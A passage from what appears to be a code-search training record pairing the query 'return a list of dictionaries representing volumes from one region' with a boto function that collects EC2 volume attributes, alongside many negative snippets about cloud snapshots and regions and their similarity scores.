get_vcdr_pg_snaps_json(strVCDRProdURL, cloud_fs_id, pg_id, sessiontoken)\n if json_response == None:\n print(\"API Error\")\n sys.exit(1)\n snaps = json_response[\"snapshots\"]\n table = PrettyTable(['Snapshot Name', 'Snaphot ID'])\n for i in snaps:\n table.add_row([i['name'], i['id']])\n print(table)\n else:\n snap_id = kwargs['protection_group_snap_id']\n json_response = get_vcdr_pg_snap_details_json(strVCDRProdURL, cloud_fs_id, pg_id, snap_id, sessiontoken)\n if json_response == None:\n print(\"API Error\")\n sys.exit(1)\n create_stamp_int = int(json_response['creation_timestamp'])\n create_stamp = datetime.utcfromtimestamp(create_stamp_int/1e9)\n expire_stamp_int = int(json_response['expiration_timestamp'])\n expire_stamp = datetime.utcfromtimestamp(expire_stamp_int/1e9)\n print(\" \")\n print(f\"Snapshot Name: {json_response['name']}\")\n # print(f\"Snapshot Creation: {json_response['creation_timestamp']}\")\n print(f\"Snapshot Creation: {create_stamp}\")\n print(f\"Snapshot Expiration: {expire_stamp}\")\n print(f\"Snapshot Trigger: {json_response['trigger_type']}\")\n print(f\"Number of VM: {json_response['vm_count']}\")\n print(\" \")", "def get_snapshot(self):\n data = {\n \"t\": self.sim.t,\n \"time\": self.time,\n \"vehicles\": self.sim.vehicles,\n \"stations\": self.sim.stations,\n \"state\": self.state,\n \"done\": self.is_done}\n return copy.deepcopy(data)", "def list_images(self):\n \n logging.debug(\"list_images entered for %s\" % self.machine_name) \n snapshots = cs.list_snapshots()\n res = []\n server_id = self.cloudserver.id\n # find the one for this server\n for snapshot in snapshots:\n img = snapshot.metadata.get(\"instance_uuid\", None)\n # print img\n\n if 
img == server_id:\n print \"Server %s has snapshot %s\" % (server_id, img)\n res.append(img)\n\n return res", "def snapshoted_instances_query(self):\n if self.row_converter.obj.id is None:\n # For new object query should be empty\n return self.mapping_object.query.filter(\n self.mapping_object.id.is_(None))\n rel_snapshots = models.Relationship.get_related_query(\n self.row_converter.obj, models.Snapshot(),\n ).subquery(\"snapshot_rel\")\n case_statement = sqlalchemy.case(\n [\n (\n rel_snapshots.c.destination_type == models.Snapshot.__name__,\n rel_snapshots.c.destination_id,\n ),\n ],\n else_=rel_snapshots.c.source_id,\n )\n snapshot = models.Snapshot.query.filter(\n models.Snapshot.id == case_statement,\n models.Snapshot.child_type == self.mapping_object.__name__,\n ).options(\n load_only(models.Snapshot.child_id)\n ).subquery('snapshots')\n return self.mapping_object.query.filter(\n self.mapping_object.id == snapshot.c.child_id\n )", "def get_db_regions(self, context, regions):\n regions_objs = self.dns_manager.get_db_regions(context, regions)\n return regions_objs", "def describe_snapshots(DirectoryId=None, SnapshotIds=None, NextToken=None, Limit=None):\n pass", "def scope(self) -> List[Region]:\n return [self]", "def list(self, arguments):\n instance_name = arguments['<instance>']\n instance_name = self.activate(instance_name)\n\n vmrun = VMrun(self.vmx, user=self.user, password=self.password)\n print(vmrun.listSnapshots())", "def post_list_snapshots(\n self, response: pubsub.ListSnapshotsResponse\n ) -> pubsub.ListSnapshotsResponse:\n return response", "def _get_orch_db_snapshot_entries(self, scroll_window: int = 1000) -> t.Iterable[SnapshotViewEntry]:\n with self.ch.orch_db_session_scope('ro') as session:\n for obj in session.query(SnapshotViewEntry).yield_per(scroll_window):\n yield obj", "def snapshot_arns(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"snapshot_arns\")", "def test_snapshots(self):\n def get_snapshots(*_args, **_kwargs):\n return {\n 'items': [\n {'selfLink': 'url/snapshot'},\n ],\n }\n self.mock(snapshots.gce.Project, 'get_snapshots', get_snapshots)\n\n key = self.create_entity('project', 'name', ['key:value'])\n expected_urls = ['url/snapshot']\n urls = snapshots.fetch(key)\n self.assertItemsEqual(urls, expected_urls)", "def test_aws_service_api_regions_get(self):\n pass", "def get_region_data(region):\n cursor = reg_data_coll.find({REGION_KEY: region})\n df = pd.DataFrame(list(cursor))\n if df.empty:\n app.logger.error(f\"While getting {region} data: no data\")\n return df", "def getRegions(self, polygon: Polygon, epsg: int) -> list:\n self.output_epsg = epsg\n polygon_df = gpd.GeoDataFrame([polygon], columns=['geometry'])\n\n polygon_df.set_crs(epsg=self.output_epsg, inplace=True)\n polygon_df['geometry'] = polygon_df['geometry'].to_crs(epsg=self.input_epsg)\n minx, miny, maxx, maxy = polygon_df['geometry'][0].bounds\n\n cond_xmin = self.metadata.xmin <= minx\n cond_xmax = self.metadata.xmax >= maxx\n cond_ymin = self.metadata.ymin <= miny\n cond_ymax = self.metadata.ymax >= maxy\n\n df = self.metadata[cond_xmin & cond_xmax & cond_ymin & cond_ymax]\n sort_df = df.sort_values(by=['year'])\n regions = sort_df['filename'].to_list()\n return regions", "def list_regions():\n regions_areas = (\n db.session.query(\n models.Region.code.label(\"region_code\"),\n models.Region.name.label(\"region_name\"),\n db.case([(models.District.code.is_(None),\n db.literal_column(\"'admin_area'\"))],\n 
else_=db.literal_column(\"'district'\")).label(\"area_type\"),\n db.case([(models.District.code.is_(None), models.AdminArea.code)],\n else_=models.District.code).label(\"area_code\"),\n db.case([(models.District.code.is_(None), models.AdminArea.name)],\n else_=models.District.name).label(\"area_name\")\n ).select_from(models.Region)\n .join(models.Region.areas)\n .outerjoin(models.AdminArea.districts)\n .filter(models.Region.code != \"GB\")\n .order_by(\"region_name\", \"area_name\")\n .all()\n )\n regions = {}\n areas = {}\n for row in regions_areas:\n regions[row.region_code] = row.region_name\n areas.setdefault(row.region_code, []).append(row)\n\n return render_template(\"regions.html\", regions=regions, areas=areas)", "def list_rds(region, filter_by_kwargs):\n conn = boto.rds.connect_to_region(region)\n instances = conn.get_all_dbinstances()\n return lookup(instances, filter_by=filter_by_kwargs)", "def regions(self) -> Sequence[str]:\n return pulumi.get(self, \"regions\")", "def extract_spawn(spoiler_logs, ages):\n spawns = [[log['entrances'][\"Child Spawn -> KF Links House\"], \n log['entrances'][\"Adult Spawn -> Temple of Time\"]] for log in spoiler_logs]\n \n return [[xx['region'] if isinstance(xx, dict) else xx for xx in x] for x in spawns]", "def GetWorldRegions():\n return GetDataFromCsvFile('world_regions.csv')", "def get_new_region_dict(db_name=DB_NAME, lang='en'):\n\n region_dict = {}\n db_dest = 'database/' + db_name\n conn = sqlite3.connect(db_dest)\n cur = conn.cursor()\n\n if lang == 'zh':\n select_col = 'NewNameZh'\n elif lang == 'en':\n select_col = 'NewNameEn'\n else:\n return None\n\n statement = '''\n SELECT DISTINCT NewRegionId, {}\n FROM RegionsOld\n ;'''.format(select_col)\n result = cur.execute(statement)\n result_lst = result.fetchall()\n for (region_id, region_name) in result_lst:\n region_dict[region_id] = region_name\n\n conn.close()\n return region_dict", "def regions(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"regions\")", "def iter_one_regions(self) -> Iterable[Tuple[Region, OneRegionTimeseriesDataset]]:\n for location_id, data_group in self.data_with_fips.groupby(CommonFields.LOCATION_ID):\n latest_dict = self._location_id_latest_dict(location_id)\n yield Region(location_id=location_id, fips=None), OneRegionTimeseriesDataset(\n data_group, latest_dict\n )", "def ListSnapshots(self):\n file_names = sorted(\n [name[:-(len(Archive._SNAP_EXT))] for name in os.listdir(self._path)\n if name.endswith(Archive._SNAP_EXT)])\n timestamps = [datetime.datetime.strptime(x, Archive._TIME_FMT)\n for x in file_names]\n return timestamps", "def region(self, args):\n m = MessageClass()\n print('123124')\n data = {'list': []}\n data['list'].append({\"Region_Name\": \"us-east-1\"})\n data['list'].append({\"Region_Name\": \"us-east-2\"})\n data['list'].append({\"Region_Name\": \"us-west-1\"})\n data['list'].append({\"Region_Name\": \"us-west-2\"})\n data['list'].append({\"Region_Name\": \"ap-northeast-1\"})\n data['list'].append({\"Region_Name\": \"ap-northeast-2\"})\n data['list'].append({\"Region_Name\": \"ap-south-1\"})\n data['list'].append({\"Region_Name\": \"ap-southeast-1\"})\n data['list'].append({\"Region_Name\": \"ap-southeast-1\"})\n data['list'].append({\"Region_Name\": \"ca-central-1\"})\n data['list'].append({\"Region_Name\": \"eu-central-1\"})\n data['list'].append({\"Region_Name\": \"eu-west-1\"})\n data['list'].append({\"Region_Name\": \"eu-west-2\"})\n data['list'].append({\"Region_Name\": \"eu-west-3\"})\n 
data['list'].append({\"Region_Name\": \"sa-east-1\"})\n m.data = data\n return m.to_json()", "def avail_locations(call=None):\n if call == \"action\":\n raise SaltCloudSystemExit(\n \"The avail_images function must be called with \"\n \"-f or --function, or with the --list-locations option\"\n )\n\n ret = {}\n conn = get_conn()\n\n for item in conn.list_locations()[\"items\"]:\n reg, loc = item[\"id\"].split(\"/\")\n location = {\"id\": item[\"id\"]}\n\n if reg not in ret:\n ret[reg] = {}\n\n ret[reg][loc] = location\n return ret", "def regions(self):\n regions = set()\n for report in self._reports:\n region = report.model.region\n if region is None or region in regions:\n continue\n yield region", "def get_regions(self,online=False):\n clients = HWIOS.pb_server.get_clients()\n regions = []\n for client in clients:\n for service in client.region_services:\n if online: \n if service['status'] == 'ON':\n for region in service['regions']:\n regions.append(region)\n else:\n for region in service['regions']:\n region['status'] = service['status']\n regions.append(region)\n return regions", "def get_recordrange(self):\r\n if self.version >= 10.1:\r\n querystr = \"\"\"?where=&outFields=*&returnGeometry=false&returnIdsOnly=false&returnCountOnly=false&orderByFields=&groupByFieldsForStatistics=&outStatistics=[{%0D%0A++++\"statisticType\"%3A+\"count\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidcount\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"min\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmin\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"max\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmax\"%0D%0A++}]&returnZ=false&returnM=false&returnDistinctValues=false&f=pjson\"\"\"\r\n req = requests.get(self.endpointurl + querystr)\r\n self.recordinfo = req.json()[\"features\"][0][\"attributes\"]\r\n\r\n elif self.version < 10.1:\r\n querystr = \"\"\"?text=&geometry=&geometryType=esriGeometryPoint&inSR=&spatialRel=esriSpatialRelIntersects&relationParam=&objectIds=&where=objectid+>+-1&time=&returnCountOnly=true&returnIdsOnly=false&returnGeometry=false&maxAllowableOffset=&outSR=&outFields=&f=pjson\"\"\"\r\n req = requests.get(self.endpontquerystr + qs)\r\n self.recordinfo = {\"oidmin\": 0, \"oidmax\": req.json()[\"count\"]}\r\n\r\n [\r\n self.iterlist.append([x, x + 999])\r\n for x in range(\r\n self.recordinfo[\"oidmin\"]\r\n if self.recordinfo[\"oidmin\"] != self.recordinfo[\"oidmax\"]\r\n else 1 - self.recordinfo[\"oidmin\"],\r\n self.recordinfo[\"oidmax\"],\r\n 1000,\r\n )\r\n ]", "def list_snapshots(self, account_id=None, max_items=100):\n if not account_id:\n account_id = get_instance_identity_document()['accountId']\n paginator = self.__client.get_paginator('describe_snapshots')\n response = paginator.paginate(OwnerIds=[account_id], PaginationConfig={'MaxItems': max_items}) \\\n .build_full_result()\n\n return EBSSnapshotsList(response)", "def get_regions():\n\n # Also known as the 'climbing directory'\n route_guide = urlopen('https://www.mountainproject.com/route-guide',\n context=ctx)\n # Opens HTML\n region_html = route_guide.read()\n # Parses HTML with BS package\n region_soup = BeautifulSoup(region_html, 'html.parser')\n # Finds regions area of the page\n regions = region_soup.find('div', id='route-guide')\\\n .find_all('div', class_='mb-half')\n\n for region in regions:\n # Link to region area guide\n url = region.find('a')['href']\n # English name of 
region\n region_name = region.find('a').get_text()\n # Writes region name and url to Areas DB. This gives the region a\n # unique id automatically\n cursor.execute('''\n INSERT INTO Areas(url, name)\n VALUES ('%s', '%s')\n ON CONFLICT DO NOTHING\n ''' % (url, region_name))\n # Commits to DB\n conn.commit()", "def get_trainscript_region_info(transcript_info, region_parent, region):\n if region_parent in transcript_info.keys():\n parent_info = transcript_info[region_parent]\n regions = []\n for r in parent_info:\n if r['object_type'] == region:\n regions.append(r)\n else:\n raise ValueError(region_parent + ' or ' + region + 'element could not be identified')\n return regions", "def regions(self):\n\n class RegionIter(object):\n def __init__(self, region_based):\n self._region_based = region_based\n\n def __len__(self):\n return self._region_based._region_len()\n\n def __iter__(self):\n return self()\n\n def _fix_chromosome(self, regions):\n for r in regions:\n r.fix_chromosome(copy=True)\n\n def __call__(self, key=None, *args, **kwargs):\n fix_chromosome = kwargs.pop('fix_chromosome', False)\n\n if key is None:\n iterator = self._region_based._region_iter(*args, **kwargs)\n else:\n if isinstance(key, string_types) or isinstance(key, GenomicRegion):\n iterator = self._region_based.region_subset(key, *args, **kwargs)\n else:\n iterator = self._region_based._get_regions(key, *args, **kwargs)\n\n if fix_chromosome:\n return self._fix_chromosome(iterator)\n else:\n return iterator\n\n def __getitem__(self, item):\n if isinstance(item, string_types) or isinstance(item, GenomicRegion):\n return self._region_based.region_subset(item)\n return self._region_based._get_regions(item)\n\n return RegionIter(self)" ]
[ "0.71616983", "0.68013346", "0.64756656", "0.6455287", "0.6392508", "0.6385133", "0.63725513", "0.6275416", "0.6235013", "0.62241733", "0.6165991", "0.6158216", "0.6134359", "0.605335", "0.6047018", "0.6043569", "0.6014061", "0.5964335", "0.5959861", "0.59526664", "0.5890748", "0.58749694", "0.58680886", "0.58511454", "0.58156496", "0.58014673", "0.5779456", "0.57731444", "0.5749603", "0.57409245", "0.56691796", "0.56569934", "0.5648708", "0.56472605", "0.5645535", "0.564447", "0.56399554", "0.5637498", "0.56297547", "0.56011677", "0.5598593", "0.55866396", "0.5585515", "0.5554067", "0.554311", "0.5515556", "0.5486095", "0.5458728", "0.5458533", "0.5445661", "0.54317784", "0.5423293", "0.5419014", "0.5408664", "0.5406546", "0.540356", "0.5395099", "0.5386243", "0.5382832", "0.5370286", "0.5368744", "0.53590137", "0.5331733", "0.5318954", "0.53171223", "0.53072006", "0.5304413", "0.52950126", "0.5294772", "0.5288212", "0.5285375", "0.5282921", "0.52693206", "0.52584034", "0.5242879", "0.52418834", "0.5239612", "0.5236293", "0.52323973", "0.52265865", "0.52195215", "0.5218574", "0.52106375", "0.5195438", "0.5192766", "0.51910245", "0.5188639", "0.51874757", "0.51861423", "0.51812404", "0.5179374", "0.51744485", "0.51536024", "0.514945", "0.5145098", "0.5142145", "0.513774", "0.5136975", "0.5132352", "0.5122334" ]
0.78463835
0
return a list of dictionaries representing volumes from one region
def getVolumesD(region):
    volumes = getVolumes(region)
    instances = getInstancesD(region)
    volumesDicts = []
    # build one dictionary of attributes per volume in this region
    for v in volumes:
        volumesDict = {"id": v.id,
                       "KEEP-tag": getKeepTag(v),
                       "instance_KEEP-tag": getKeepTag(getInstanceOf(v)),
                       "instance": v.attach_data.instance_id,
                       "status": v.status,
                       "size": v.size,
                       "create-time": v.create_time,
                       "region": v.region.name,
                       "zone": v.zone,
                       "snapshot_id": v.snapshot_id,
                       "PROD": isProduction(v)
                       }
        volumesDicts.append(volumesDict)
    return volumesDicts
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_volumes(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_volumes = conn.get_all_volumes()\n except boto.exception.EC2ResponseError:\n return [] # This better not fail silently or I'll cut a person.\n return region_volumes", "def _get_data_volumes(vm_):\n ret = []\n volumes = vm_[\"volumes\"]\n for key, value in volumes.items():\n # Verify the required 'disk_size' property is present in the cloud\n # profile config\n if \"disk_size\" not in volumes[key].keys():\n raise SaltCloudConfigError(\n \"The volume '{}' is missing 'disk_size'\".format(key)\n )\n # Use 'HDD' if no 'disk_type' property is present in cloud profile\n if \"disk_type\" not in volumes[key].keys():\n volumes[key][\"disk_type\"] = \"HDD\"\n\n # Construct volume object and assign to a list.\n volume = Volume(\n name=key,\n size=volumes[key][\"disk_size\"],\n disk_type=volumes[key][\"disk_type\"],\n licence_type=\"OTHER\",\n )\n\n # Set volume availability zone if defined in the cloud profile\n if \"disk_availability_zone\" in volumes[key].keys():\n volume.availability_zone = volumes[key][\"disk_availability_zone\"]\n\n ret.append(volume)\n\n return ret", "def volumes(self) -> dict:\n return self.data[\"volumes\"]", "def volumes(self):", "def show_asm_volumes(self):\n sql = \"select NAME from v$asm_diskgroup_stat ORDER BY 1\"\n self.cur.execute(sql)\n res = self.cur.fetchall()\n key = ['{#ASMVOLUME}']\n lst = []\n for i in res:\n d = dict(zip(key, i))\n lst.append(d)\n print(json.dumps({'data': lst}))", "def get_volumes(self):\n url = self._get_url() + 'volumes'\n volumes = self._request(url)\n return volumes.json()", "def get_volumes_detail(self, **kw):\n return (200, {}, {\"volumes\": [\n {'id': 1234,\n 'name': 'sample-volume for cinder',\n 'attachments': [{'server_id': 12234}]},\n {'id': 'pvcvolume',\n 'name': 'pvc sample-volume for cinder',\n 'attachments': [{'server_id': 54321}]}\n ]})", "def get_volumes(instance):\n if instance.cloud == 'aws':\n client = boto3.session.Session().client('ec2', instance.region)\n devices = client.describe_instance_attribute(\n InstanceId=instance.id, Attribute='blockDeviceMapping').get('BlockDeviceMappings', [])\n volumes = client.describe_volumes(VolumeIds=[device['Ebs']['VolumeId']\n for device in devices if device.get('Ebs', {}).get('VolumeId')]).get('Volumes', [])\n return {volume['Attachments'][0]['Device']: {'size': volume['Size'], 'volume_type': volume['VolumeType']} for volume in volumes}\n if instance.cloud == 'gcp':\n credentials = GoogleCredentials.get_application_default()\n compute = discovery.build('compute', 'v1', credentials=credentials)\n volumes = {}\n for disk in compute.instances().get(instance=instance.id,\n zone=instance.zone,\n project=instance.project).execute()['disks']:\n index = disk['index']\n name = disk['deviceName'] if disk['deviceName'] not in [u'persistent-disk-0', 'boot'] else instance.id\n if 'local-ssd' in disk['deviceName']:\n size = 375.0\n disk_type = 'local-ssd'\n else:\n size = float(disk.get('diskSizeGb', 0.))\n disk_type = 'pd-ssd'\n volumes[index] = {'size': size,\n 'type': disk['type'],\n 'deviceName': disk['deviceName'],\n 'interface': disk['interface'],\n 'diskType': disk_type}\n return volumes\n raise ValueError('Unknown cloud %s' % instance.cloud)", "def database_volume_get_list():\n db = database_get()\n\n session = db.session()\n query = session.query(model.Volume)\n\n volume_objs = list()\n for volume in query.all():\n nfvi_volume_data = json.loads(volume.nfvi_volume_data)\n nfvi_volume = 
nfvi.objects.v1.Volume(nfvi_volume_data['uuid'],\n nfvi_volume_data['name'],\n nfvi_volume_data['description'],\n nfvi_volume_data['avail_status'],\n nfvi_volume_data['action'],\n nfvi_volume_data['size_gb'],\n nfvi_volume_data['bootable'],\n nfvi_volume_data['encrypted'],\n nfvi_volume_data['image_uuid'])\n volume_obj = objects.Volume(nfvi_volume)\n volume_objs.append(volume_obj)\n return volume_objs", "def generateInfoVolumes(regions):\n print \"\\nWriting volumes info to output file %s\" % volumes_data_output_file\n with open(volumes_data_output_file, 'w') as f1:\n f1.write(\"VOLUMES\\n\")\n f1.write(\n \"Name\\tvolume_ID\\tKEEP-tag_of_volume\\tKEEP-tag_of_instance\\tproduction?\\tvolume_attachment_state\\tassociated_instance\\tinstance_state\\tsize\\tcreate_time\\tregion\\tzone\\tassociated_snapshot\\n\\n\")\n for r in regions:\n volumes = getVolumes(r)\n print \".\" # give some feedback to the user\n for v in volumes:\n f1.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\"\n % (get_name_tag(v), v.id, getKeepTag(v), getKeepTag(getInstanceOf(v)), isProduction(v), v.attachment_state(), v.attach_data.instance_id, v.status, v.size,\n v.create_time, v.region.name, v.zone, v.snapshot_id))", "def get_volumes(self):\n res = self.get('%s/volumes' % self.catalog['volume'])\n if res['status'] == 200:\n return json.loads(res['body'])['volumes']\n else:\n LOG.error('Get volumes failed: %s %s %s' %\n (res['status'], res['reason'], res['body']))\n raise InvalidResponse(res)", "def getImagesD(region):\n images = getImages(region)\n imageDicts = []\n for im in images:\n imageDict = {\"name\": im.name,\n \"id\": im.id,\n \"region\": im.region.name,\n \"state\": im.state,\n \"created\": im.creationDate,\n \"type\": im.type,\n \"KEEP\": getKeepTag(im),\n \"name_tag\": get_name_tag(im),\n \"snapshots\": getSnapshotsOf(im),\n \"description\": im.description,\n \"PROD\": isProduction(im)\n }\n imageDicts.append(imageDict)\n return imageDicts", "def getSnapshotsD(region):\n # Can a snapshot belong to more than one AMI? 
Dunno, keep list just in case (so it never breaks due to it)\n snapshots = getSnapshots(region)\n snapshotsDicts = []\n ims = getImages(region)\n for s in snapshots:\n amis = getAmisOf(s, ims)\n amiIds = []\n amiKeeps = []\n\n if len(amis) == 1:\n amiIds = amis[0].id.encode()\n amiKeeps = getKeepTag(amis[0])\n\n elif len(amis) == 0:\n amiIds = \"-------no-AMI-found\"\n amiKeeps = \"-------no-AMI-found\"\n else:\n for a in amis:\n amiIds.append(a.id.encode())\n amiKeeps.append(getKeepTag(a))\n\n snapshotsDict = {\"id\": s.id,\n \"status\": s.status,\n \"region\": s.region.name,\n \"progress\": s.progress,\n \"start_time\": s.start_time,\n \"volume_id\": s.volume_id,\n \"volume_size\": s.volume_size,\n \"KEEP-tag\": getKeepTag(s),\n \"Name\": get_name_tag(s),\n \"AMI(s)\": amiIds,\n \"AMI_KEEP-tags\": amiKeeps,\n \"PROD\": isProduction(s),\n \"Description\": s.description\n }\n snapshotsDicts.append(snapshotsDict)\n return snapshotsDicts", "def get_volumes():\n vols = []\n try:\n result = run_diskpart(['list volume'])\n except subprocess.CalledProcessError:\n pass\n else:\n # Append volume numbers\n output = result.stdout.decode().strip()\n for tmp in re.findall(r'Volume (\\d+)\\s+([A-Za-z]?)\\s+', output):\n vols.append({'Number': tmp[0], 'Letter': tmp[1]})\n\n return vols", "def data():\n return volumes_fetchers.get_json_data()", "def list_volumes(self):\n print '# Listing existing volumes'\n self.compute.list_volumes()", "def get_volume(vol_dir):\n volume = []\n # Retrieve all the dicom filepaths\n files = get_filepaths(vol_dir)\n \n for slice_nr, dicom_path in enumerate(files):\n ds = pydicom.dcmread(dicom_path)\n img = ds.pixel_array\n \n if slice_nr == 0:\n # Get this on the first slice only\n spacing = ds.PixelSpacing\n spacing.append(ds.SliceThickness)\n spacing = np.asarray(spacing)\n \n # Note: In our case, sequence name contains venc and direction info\n sequence_name = ds.SequenceName\n # print(sequence_name)\n\n volume.append(img)\n volume = np.asarray(volume)\n return volume, spacing, sequence_name", "def calculateVolumes(data):\n print \"Calculating volumes...\"\n results = {}\n for dataLine in data:\n name = dataLine['name']\n r1 = dataLine['r1']\n r2 = dataLine['r2']\n r3 = dataLine['r3']\n r4 = dataLine['r4']\n t1 = dataLine['t1']\n t2 = dataLine['t2']\n t3 = dataLine['t3']\n volCup = (math.pi/3.0) * t1 * ((r1**2) + (r4**2) - (r1*r4))\n volPeanut = math.pi * (t1 - t2 - t3) * ((r2**2) + (r3**2) - (r2*r3)) / 3.0\n volChoc = volCup - volPeanut\n ratio = volChoc/volPeanut\n print \"Ratio for \" + name + \" is \" + str(ratio)\n results[name] = [r1, volChoc, volPeanut, volCup, ratio]\n return results", "def list_volumes(self, node=None):\n\n data = self._perform_get(self._get_disk_path(), Disks)\n volumes = [self._to_volume(volume=v, node=node) for v in data]\n return volumes", "def database_volume_snapshot_get_list():\n db = database_get()\n\n session = db.session()\n query = session.query(model.VolumeSnapshot)\n\n volume_snapshot_objs = list()\n for volume_snapshot in query.all():\n nfvi_volume_snapshot_data = \\\n json.loads(volume_snapshot.nfvi_volume_snapshot_data)\n nfvi_volume_snapshot = nfvi.objects.v1.VolumeSnapshot(\n nfvi_volume_snapshot_data['uuid'],\n nfvi_volume_snapshot_data['name'],\n nfvi_volume_snapshot_data['description'],\n nfvi_volume_snapshot_data['size_gb'],\n nfvi_volume_snapshot_data['volume_uuid'])\n volume_snapshot_obj = objects.VolumeSnapshot(nfvi_volume_snapshot)\n volume_snapshot_objs.append(volume_snapshot_obj)\n return volume_snapshot_objs", "def 
get_complete_volume_info_all():\n\n return_list = []\n try:\n vl, err = get_basic_volume_info_all()\n if err:\n raise Exception(err)\n # print 'vl is', vl\n\n if vl:\n for vol_info_dict in vl:\n\n rd, err = get_complete_volume_info(\n vol_info_dict['name'], vol_info_dict)\n if err:\n raise Exception(err)\n\n return_list.append(rd)\n\n except Exception, e:\n return None, 'Error getting complete volume information for all volumes: %s' % str(e)\n else:\n return return_list, None", "def volumes(self):\n return self._volumes", "def volumes(self, details=True):\n if details:\n vol = _volume.Volume\n else:\n vol = _volume.VolumeDetail\n\n return list(self._list(vol, paginated=False))", "def get_surfaces_per_volume(my_core, entityset_ranges):\n\n s_p_v = {}\n for volumeset in entityset_ranges['Volumes']:\n s_p_v[volumeset] = my_core.get_child_meshsets(volumeset).size()\n return s_p_v", "def populate_volumes(self):\n print \"Populating volumes info...\"\n volumes = self.get_all_volumes()\n for i in volumes:\n\n # handle associated instance's KEEP-tag\n associated_instance_id = i.attach_data.instance_id\n\n if associated_instance_id is None: # sometimes there is no attached instance\n instance_keep_tag = \"-------no-instance-found\"\n else:\n instance_keep_tag = Ins.spreadsheet[associated_instance_id]['KEEP_tag']\n self.spreadsheet[i.id] = dict(Name_tag=self.get_name_tag(i), id=i.id, KEEP_tag=self.get_keep_tag(i),\n instance_KEEP_tag=instance_keep_tag,\n associated_instance_id=associated_instance_id,\n PROD_tag=self.is_production(i), attachment_state=i.attachment_state(),\n state=i.volume_state(), status=i.status, iops=i.iops, size=i.size,\n created=i.create_time, region=i.region.name)", "def items(self):\n if self.__has_contents:\n return [dict(zip(['id', 'description', 'size', 'start_time', 'state'],\n [item['SnapshotId'], item['Description'], item['VolumeSize'],\n item['StartTime'], item['State']]))\n for item in self.__response['Snapshots']]\n else:\n return []", "def get_volume_list():\n return parse_list_output(Popen('cinder list --all-tenants'.split(),\n stdout=STDOUT, stderr=STDERR).communicate()[0])", "def get_volume_snapshots(self, volume):\n LOG.debug('get_volume_snapshot starts')\n pool_name = self.configuration.rbd_pool\n volume_name = 'volume-%s' % encodeutils.safe_encode(volume[\"id\"])\n snaps_on_vol = self._get_volume_snapshots(pool_name, volume_name)\n snapshots = list()\n if snaps_on_vol is not None:\n for snap in snaps_on_vol:\n snap_name = str(snap[\"name\"])\n item = dict()\n if snap_name.startswith(\"snapshot-\"):\n # snapshot directly created on volume.\n item[\"type\"] = \"volume_snap\"\n item[\"uuid\"] = snap_name[len('snapshot-'):]\n elif snap_name.startswith(\"volume-\") and \\\n snap_name.endswith(\".clone_snap\"):\n # snapshot used for create volume on volume.\n item[\"type\"] = \"clone_snap\"\n item[\"uuid\"] = snap_name[len(\"volume-\"):-len(\".clone_snap\")]\n elif snap_name.startswith(\"backup.\") and \".snap.\" in snap_name:\n # snapshot used for backup volume.\n item[\"type\"] = \"backup_snap\"\n item[\"uuid\"] = \\\n snap_name[len(\"backup.\"):snap_name.index(\".snap.\")]\n else:\n item[\"type\"] = \"\"\n item[\"uuid\"] = \"\"\n snapshots.append(item)\n\n LOG.debug('volume snapshots: %s', snapshots)\n LOG.debug('get_volume_snapshots finished.')\n return snapshots", "def getVolumePoints(minRes, rRes, region):\n\n # when every resolution has the same bndry buffer\n maxDx = (1. 
+ 1.e-8) * lx / float(minRes)\n dr = pecRad / float(rRes)\n\n # shell distances inside dielectric\n rmin = 0.5 * math.sqrt(3.0) * maxDx\n rmax = epsRad - 3.0 * maxDx\n rIn = numpy.arange(rmin, rmax, dr)\n\n # shell distances outside dielectric\n rmin = epsRad + 3.0 * maxDx\n rmax = pecRad - 3.0 * maxDx\n rOut = numpy.arange(rmin, rmax, dr)\n\n if region == \"in\":\n rs = rIn\n elif region == \"out\":\n rs = rOut\n else:\n rs = numpy.concatenate([rIn, rOut])\n\n points = []\n for r in rs:\n dTheta = math.acos(1.0 - 0.5 * (dr / r)**2)\n thetaMin = math.asin(maxDx / r / math.sqrt(2.0))\n thetaMax = math.acos(0.5 * maxDx / r)\n for theta in numpy.arange(thetaMin, thetaMax, dTheta):\n sinTh = math.sin(theta)\n dPhi = dTheta / sinTh\n phiMin = math.asin(0.5 * maxDx / (r * sinTh))\n phiMax = math.acos(0.5 * maxDx / (r * sinTh))\n for phi in numpy.arange(phiMin, phiMax, dPhi):\n points.append([r * math.sin(theta) * math.cos(phi),\n r * math.sin(theta) * math.sin(phi),\n r * math.cos(theta)])\n return points", "def get_volume_info(volumes):\n if type(volumes) is not list:\n volumes = [volumes]\n volume_info_list = []\n for volume in volumes:\n command = 'cinder show %s' % volume['id']\n volume_info = parse_output(Popen(command.split(), stdout=STDOUT,\n stderr=STDERR).communicate()[0])\n att = volume_info['attachments'].replace(\"'\", \"\\\"\").replace(\n \"u\\\"\", \"\\\"\").replace(\" None,\", \" \\\"None\\\",\")\n volume_info['device'] = json.loads(att)[0]['device']\n volume_info_list.append(volume_info)\n return volume_info_list", "def fusion_api_get_storage_volumes(self, uri=None, param='', api=None, headers=None):\n return self.volume.get(uri=uri, api=api, headers=headers, param=param)", "def volume(self):\n v = {'art': self._vart, 'ven': self._vven}\n if self._lvad is not None:\n v['lvad'] = self._lvad.volume['lvad']\n return v", "def volume(self):\n v = {'art': self._vart, 'ven': self._vven}\n if self._lvad is not None:\n v['lvad'] = self._lvad.volume['lvad']\n return v", "def volume(self):\n v = {'art': self._vart, 'ven': self._vven}\n if self._lvad is not None:\n v['lvad'] = self._lvad.volume['lvad']\n return v", "def get_named_volumes(blocks_partition, block_shape):\n logger.debug(\"== Function == get_named_volumes\")\n d = dict()\n logger.debug(\"[Arg] blocks_partition: %s\", blocks_partition)\n logger.debug(\"[Arg] block_shape: %s\", block_shape)\n for i in range(blocks_partition[0]):\n for j in 